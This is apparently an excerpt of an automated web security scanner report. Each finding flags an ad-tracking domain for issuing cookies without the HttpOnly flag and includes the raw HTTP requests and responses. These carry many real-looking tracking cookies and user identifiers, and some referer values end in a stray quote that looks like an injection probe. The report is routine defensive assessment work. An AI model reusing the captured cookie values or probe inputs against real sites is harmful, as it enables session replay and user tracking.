Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: close
Server: YTS/1.19.4

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<!--
...[SNIP]...

17.91. http://pix01.revsci.net/J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix01.revsci.net
Path:   /J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif?D=DM%5FLOC%3Dhttp%3A%2F%2Fwww%252Ewashingtonpost%252Ecom%2Fwl%2Fjobs%2Fhome%253Fwpsrc%253DAG0002174%2526keyword%253D4846831919%2526cre%253D430450907%2526g%253D1%2526s%5Fkwcid%253DTC%2D21380%2D4846831919%2De%2D430450907%2526thisNode%253Dhome%252Ejsp%26DM%5FREF%3D%26DM%5FTIT%3DWashington%20DC%20Area%20Jobs%20%2526%20Careers%3A%20Find%20Your%20Perfect%20Job%2C%20Search%20Now%21%26DM%5FEOM%3D1 HTTP/1.1
Host: pix01.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4ddcf645&0&&4db782ef&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4ddd4f0f&0&&4db785ef&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4ddd5040&0&&4db783f9&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4ddd50a2&0&&4db7974a&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4ddd7ae8&0&&4db793f3&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9SENLipv597JLOz4/ywNPTNxEVAOIYCdRelXOzKIRj+39hgkAwD0RltVgL5OR8z4ufqL2JTRgutCG8bH0i2CxMBFHo63bCHdwHxB4BmexyTA8QJJCrTjwem4Rz6vlfmAXZaPkg3/fgGQdxMq5vA03XyhyjKjrmnx6+FJVKmvq1UtLolE/wIYHveGzjeajpDXWQ1J7CBJjBz4B6eDrX2L08P9ZFPE6oRnJWx8uw8wJBAU393RlttIzV+Qhn8MKk7OQiBDL0BgW4aB/MRo1q9ia3EciExyL5yLPHJjIBNhX+QqfSs5Cl4QzaZ9F29c1QiBqzSWOiWdhbBatzmnixywgT8lvFnT4QL3q0Cj3x9XfuCF0IE+G1vSGcP13Prb15jSRxeRn/X3s2YOmR3K3w4IGfd/riyQEciK7VP3tLodiYFLdClT1RZYi22aneJA71eL7+Ya9/kRvCgp5LiQPt6+rIhd7ZRsW0FEhTWmbpqYcAVEfS0I3sPOGB+WigblQoB5h4djNBQndjcxKmAZ9rGZAPkKN1/UYr+qOjTdwypVpD6P/cdrwUFvb2KW5DQMuxBXRUggNPND2K7/fNsSwE1eFYYWAkfouY3GUlBc02ZuTo+msRjGLZflLAgjK0YKoR5qRhxh1tf+3K1rpnLvPkp9vz9k6PHr4SmrbNefYS1eYWN06OW5SgSYNzlmltyIXRjTzJ8Xgexa9RpvUyxXuyDstcFfBbATJM8gsWvZXVRC05ZxtEuXSpyGib+Z7pD1NAV6PTRkoBxWal3h6saqOb3SGIeMNBJ+jx1JOF1QF42HSqHlryDRDZ5kreBCo098HNm2PCKxfBeYNL4lcGIeYBXTb/+QAoqh0PqlKL5XqdArvsfziWOyLnTh0Kkq8XB7bLjOyK6x1DYKg7uumGCcuzXWMeutXR1EGd5ZojkPFq4/lhF8bFM8/2VZOLN5O155wZf/X9644rvMJpsKp1BZrHZs+/rpF/6Vg/uo2+obA/ipqe7I7Oj/r9T/PZFmGD8BtQINx/SgMTB6KGjn2nGlqBU7iD6LVv3qvJufGtydaJV+FYH7rLKOx0NULq5A+/LZTT6GsUoR2IuhBzpInYsMMiKmKHRhIz3Kvyhv0Y39fsTnOpUH1Ya0wDfK43SrYmnk/T0ct1UlNAk1bx10Q1aY7bidfsGH4wyNw/B//zjaHmOf17HK; 
rsi_segs_1000000=pUP15jOFb3IQDqIu1Hhm/da3+uSni//DBRincYhphhdmEVPNelSxYUS4+U1Joi+vXIZg3CJmbl6qO0d3dqlvOWYpudTV4Voav+Q+5zpE+UjDPyzpV/8S6whLBR2lB2WawM3t+Fb3ocE+VD+HVCzXcWQrjQd9nfMwL8eiWwp5rJfCON223S82t0AJ7E0fYcONDby07hqAtzkyS/Zh39I6n85ANWCrqvA4l/0dGi3VrJ+5ZyaadxnN/OBC4X5GhWxfABQU5Rl8fKTwUYRcs7znb3Qum3v0KY3igmRpDolWPrACkf1Hc6JQwYLC4MGoQsiXhR/YGQoGf7hVpjxwR4y+8tHqy008ecCB0dNuqTRG; rtc_xaNz=MLsHtSEOYQ5jJhFEjE7V7MKBJ1QDGTL0xZ7zF8dplkWrbITDjmJ8eM707TdmNgaI0g3GXcR/P4Fxz8PfR2IjDW2RJK83tn47FGJ7fdq8ELqyjVgasfcuWDjdORh1shdmyU9uxedGSanbaBz1PaqWM/PREGl/m/qeHXc/WZH+Dgo6X96L+pCBorF+TNxQRAWfzWjMj2I8o9ObxoZCICuBK1/2qL55SlebEPPHZZv0mxkLGyY/WIYPOZhhttuMr3Q4z2/BD8O8pL3CkSzGuuDTvaTc4qCxMoP2Jezab7Qw87iMMi0epru/jxgjCl9WnuD2iMP9Ckn5dTYpQVfaoTdsNkpA7y2M06nH6rH4wEcBgkSx/uBET30t3wIlJ6HsTseIP1z5gWfvqaDt/JAuZpm/cJa2QAmWLJl6wswHJo+HB/6sevl3T1Ahn4inevXQhVzP5SzYP4YkU+DIxlvIq5DKRzbtlJ+t0ni/DWuiUJb+DLW3NUMwiGFMTXNUcvEZk1zr7Qd9etu3kEz3AzjYrZbAyqyXgsLC1QaEfLCSooqB14xwUHyaOJV823ccZQxty6+H4QCPsf4KNBH5KTfvm33EtmPRX6H55suB1YW3hnQdc9AiiXRQag323RigTOhwsgA1U0SNCgdSSrIaUdceMZt7Nt8gD1OxVsOQvH4cKbfBNN5SQzH23EjjvuKap8ozWuTb3OKqW9ddvuo/LcB4KOuJxI03Yohpr3qjo3F91PC+X25pmiXd3QIi; rsiPus_KoZy="MLsXrl8OZi5n4BD3cBZyjuABuWC4Csb0FwUT+Tf/ra2F23Yr8I/oeuwGctxr0i9k80z5+Ts37HpJWH5tx7ymALJCD0jt3YjxTTdM3JvgE976HlS8BET9gOVhjUYb6nxqMxO2LSljPwK3m5C91Tp/+zMbiZ3l0rXTRlqctD+i58MewI/dqdLPzRqf/27Ck4fV/tXYZjC6PsOJ0LP14q9RirhDfT4536oDEBbrBii+FPkl5ulI86i//mF/Ihwohay+AGl7Yn7K2R0FWrjhrOHtaZAMobFZE11r5ProA/7NdGfrf6pDi8cUzwkfwo+puxslrUGAu2uvT5Z0UrY8UwRkxW/vrgzFdXZqCAjwp7vzLO9CE0gZQ7wUlZGJim+VOBL1moOapTPxt4wXMk809VsgCkVFCnZ43yLvCnKFVW67eOExYmd+JNSA6VR1ad6OjY3ES0+TfN1COTV35yB2Je5lVhz8KFs9m3lE6O8klZ3o5XAqY7u1xfcrbqVVmx+aUwamFT5uGIDC3paOb5n5zA0="; 
rsi_us_1000000="pUMdIz1HMAYU1Q23kD2gQlP9hregpcCW/V5c7M/G6n4W4mvTYenih6EKWpeOr4+Ll/y5R0Unj/LO5PdEBw/eJPglYEstHCojiOu9XSRlWWR/QO1SSuxATYbIb1Lfm+FXekBMjalx+GDpg8auRaANRpH94U/E0lZJWj3fXAp3bIkV5gANlu/6hpI4w2DhRC/NVjY//S1N9dvws5Fcv0coUdJ5ovh/i6KiZ/NTh0SwAPSjFYGtC+n+BhnM7E5ccgkAVCkI932ukgJfzqwALNmXtBxTiwZIth6E1Z2Zd9anAg5EX60juVXtwhNQdqK9t3nO6LbKIyB3MtebdzKy2HVDbRuWLb2lZcUfzB20bxbKl7dD7bFNiKS6voC/k1kAfALYMhC261oMDnN7Pj+HlVnO8O+fDxcFHnLynM7rfPr1Q2PkFDRMIXaVgSfL4HzHiZbZP2AmC8AGdhZxKUfXV4Z99Rc1jtmknr7y9/O2aF45rjN4DXXTL6WcKJVbWylOgxrxUFnOR0S6er3mpddjXfX8uPcdrquy5/WNjZiFo5E9+Vv0DEnaw9phZ0cU7p8Onko84PB5HUGnzJMhBFPJkmmqNZ7LlOfsSRdjb/yPCCEot4PvJfqCpCwPYBz2l4xgSYHCoMHFh+BMm+4H7E+DhB4nCVZr8wEkzjlKDIt0O9cSthlhINJrMKroXythtqiwkeuwjz0Ygb8WpfJnrSOjIsNAt9wP196yM5K/sRFDpa9qA5Lp5nF1wHFHbYkgHAdxcjXpMaVvZ1n0GRjXJDzFqUxnp+5yWhADqUaxQOJ9LOkAGWRyqS1gIgVmxAIVc9d+FAUVCHtXs9sKQrum6vL5mvZt5HdAsvmcqsMTplSR7ALkvg8w3wrl74KIV1pxLFzZKDEAmAj9JSKDhAqlzSkpT9ifpSuGrw+BXDQyuS3hLWRbaSjb3qmhPQln3pZjJlWHUunVoJUbyEpWgRizDaTcMqabtv8+Ronk4VDjkdSas5vuJNKracRLjZa8SPtJdk1o/iLDhC1B6ittEW81WOr3Xm3hK80wa7leBcmEbUn0Hggk0E9lhdVUrOq438eNG/DhIVKO9OC5rYs2ElTc6qyDNdn9bmTUuYjb2jyTEtZAmM73J3hIqp0Nco4jeWB5mfGUj10PwA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_xaNz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP95TOFb3IQDqIu1Hhm9eJF2URyyYddaQTz7GCqw4YkAQ+qw6DMwutBdt7A14dgfNdNJ6boNHoksgj4yo4380GOe0Sly4gefJT6j60BI89IrwI3ERkQN5YzX7WgzdkBuIzeCyU5dWh0FAgZ47wCW2vuLZ+tS/27ziagTP9SATZHprMXjSYHimqnSt3PsWW1ZUw/W5zCuwAjResmzJbCl9JthdiqbMsjkghKMi7yT9T6kQyChlqMgP4aqT7tsmcOD1OLsy5KWuptM4j35YcYAFdcJp/fX5a4t0BTioh7LN+OGQishl0HmZcQTGFp7laT6B4hf5fp2UsWmuRf9bfofL7UdIrBCDeJShiozEtZ8RsSamrMQ/g22rolHVP2OA==; Domain=.revsci.net; Expires=Mon, 30-Apr-2012 23:34:41 GMT; Path=/
Set-Cookie: NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d811&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Sun, 29-May-2011 23:34:41 GMT; Path=/
Set-Cookie: rtc_mXZ-=MLsHtaUqYR5jJ5Eert5J4zjwI0Yn0GUmvNxcOH9aUaXt40tHjX8vrSL6lIJv17IAwX/77DMkdThlYBEtanQjHiBOTu6VdD81U54WgfTp1ulWQP/xIrSVh3NFbdqPsMPlBqqoJaTKM2XOC0KXXykHjW00phpzgWrk4LpEqlq46xWLs8WebFJ9co8dW4ExdEJVKDgVM8TS3zM/XVrNVu1vqBCOR8949nZw1Rcva/IoiyX77p/ovb/wkdFouI4dNNN5sFguHBNMSNcKUIr4/Q000/FakMdPzNkviWS5wioQCKcOtbfqrbkr6GSPK1NhGk9hhZqZEnrdgIqZjIcXu3v0H9kvT36K1eYv/EG6m0azxSgssbCQgxA2vxvOG/PgijkOvxPQ14dIYkdeWaewFfby+BXqLABIuFfg/afjjo1LF7VoWe80jJbRqF4iL6UYvgrGmIXGhHvBq8JUxxzxjUC6vjlOc1jRDeUhU9/dNLgeNBoo30uJG/CIb3MMNIiruc8YYpJWUeKmABKZ7nwF2U/ROk2f7dLVpcm5nZAUNqv1wTjWzD7RzzuLow8xWnlY+oX102McprMcv1+0G5Kls8q9+a0tsc145kfssSlrOk9smBE1n2HcHmYPSuaVWFRpnWa6+VH0U8XuJBBkXxqYgupSZQxvzSHAK/8ls+qf4Pau+uAkrqyXp5REHXpZL52sZJbyyHWba7yWYJG7clfknngWYU5lXnV2Zvuh8+ww6lSRfwcQbNlnEGWf1QyfEdQGwlofRE1s102E9mXqm5DJAPuKMj8YbdK/jxyW0ToaeYF3D5g4gvzMU9i0eEeyksIWBlqKdamr7/vAqdxrH5yA2Q==; Domain=.revsci.net; Expires=Mon, 30-Apr-2012 23:34:41 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 01 May 2011 23:34:41 GMT

GIF89a.............!.......,...........D..;

17.92. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=9&exchange_id=4 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:23:11 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"3\": 1304303011+ \"2\": 1304243633}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Content-Length: 512
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4316443142505&PixelID=186","javascr
...[SNIP]...

17.93. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=847987400;fpan=0;fpa=P0-1959175184-1304319359595;ns=0;url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml;ref=http%3A%2F%2Fwww.japanator.com%2Ffavicon.ico';ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304319368576;tzo=300;a=p-25XjRGUyZYjok HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EGgAD-8kjVmtjIMAAZsBAdMGgZMAmtGCqVKLPR_BodpxqWIBo0wR_hEEAcEgAAAwQBu2S7IMIDXHQxAhGxIBIgGhKLIlCWEAsS0zQjCCAwQY5RAOiSABAshEiysQ

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=902031&id=1085044&id=1230047&t=2
Set-Cookie: d=ECwAD-8kjVmtjIMAAa0BAdMGgZMAmtGCqVKLPR_Bob88GbPRqWIBo0wR_hEEAcEgAAAwQBu2S7IMIDXHQxAhGxIBIgGhKLIlCWEAsS0zQjCCAwQd0cGoTRAOiSABAr4uGKGRiysQ; expires=Sun, 31-Jul-2011 01:56:08 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 02 May 2011 01:56:08 GMT
Server: QS


17.94. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4554&nid=1430&put=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&expires=180&cb=xy7kwd&next=http%3A%2F%2Fa.triggit.com%2Fpxruourcm HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C208%2C2%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 02:04:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; expires=Wed, 01-Jun-2011 02:04:53 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C243%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; expires=Wed, 01-Jun-2011 02:04:53 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; expires=Sat, 29-Oct-2011 02:04:53 GMT; path=/; domain=.rubiconproject.com
Location: http://a.triggit.com/pxruourcm
Content-Length: 0
Content-Type: text/html; charset=UTF-8


17.95. http://r.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:10:38 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:10:38 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4222959636846101819&fpid=4&nu=n&t=
...[SNIP]...

17.96. http://s28.sitemeter.com/js/counter.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/counter.asp?site=s28japanator HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 01:57:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7266
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:07:32 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...

17.97. http://segment-pixel.invitemedia.com/set_partner_uid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=79&partnerUID=1754bb650623c5be43fca0b57c3910d9&sscs_active=1 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
